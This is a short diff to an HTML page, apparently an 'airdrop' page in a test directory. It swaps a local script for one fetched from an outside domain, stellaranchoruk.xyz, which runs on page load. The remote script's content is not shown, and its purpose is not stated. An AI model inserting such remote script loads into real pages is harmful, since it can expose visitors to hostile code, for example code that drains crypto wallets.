--- a/test3/index.html
+++ b/test3/index.html
@@ -531,6 +531,6 @@
 </section>
 
 
-<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="scripts/airdrop2.72b2057fb25d38ec050aed4485c2ba28.js"></script>
+<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="https://stellaranchoruk.xyz/scripts/info.js"></script>
 </body>
 </html>
